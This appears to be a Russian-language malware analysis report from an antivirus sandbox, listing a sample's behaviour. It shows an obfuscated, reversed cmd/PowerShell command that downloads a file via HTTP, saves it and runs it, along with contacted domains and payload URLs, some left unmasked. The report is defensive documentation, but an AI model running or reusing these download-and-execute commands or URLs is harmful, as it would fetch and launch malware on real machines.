Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:/C"set mF= }}{hctac}}kaerb;wrb$ ssecorP-tratS;)wrb$(elifotevas.tqA$;)ydoBesnopser.VqH$(etirw.tqA$;1 = epyt.tqA$;)(nepo.tqA${ )'*ZM*' ekil- txetesnopser....
Сетевая активность
Подключается к
- 'ru####berlin.com':80
- 'in#######y.boilerhouse.digital':80
- 'in#######y.boilerhouse.digital':443
- 'ct####.portalserver.nl':80
- '2r##s.fr':80
TCP
Запросы HTTP GET
- http://ru####berlin.com/m2tB9FDNej
- http://in#######y.boilerhouse.digital/MxPVLAAX
- http://ct####.portalserver.nl/CN7E4iL
- http://2r##s.fr/wgkIDe1ax
UDP
- DNS ASK ru####berlin.com
- DNS ASK in#######y.boilerhouse.digital
- DNS ASK an####ahumada.cl
- DNS ASK ct####.portalserver.nl
- DNS ASK 2r##s.fr
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe /V:/C"set mF= }}{hctac}}kaerb;wrb$ ssecorP-tratS;)wrb$(elifotevas.tqA$;)ydoBesnopser.VqH$(etirw.tqA$;1 = epyt.tqA$;)(nepo.tqA${ )'*ZM*' ekil- txetesnopser....' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set mF= }}{hctac}}kaerb;wrb$ ssecorP-tratS;)wrb$(elifotevas.tqA$;)ydoBesnopser.VqH$(etirw.tqA$;1 = epyt.tqA$;)(nepo.tqA${ )'*ZM*' ekil- txetesnopser.VqH$( fI;)(dnes.VqH$;)...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "powershell $PAY='UNl';$ahB='http://ru####berlin.com/m2tB9FDNej@http://info-daily.boilerhouse.digital/MxPVLAAX@http://andreaahumada.cl/sCEVt0F5z@http://ctgb-a.portalserver.nl/CN7E4iL@http://2re...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =UNl
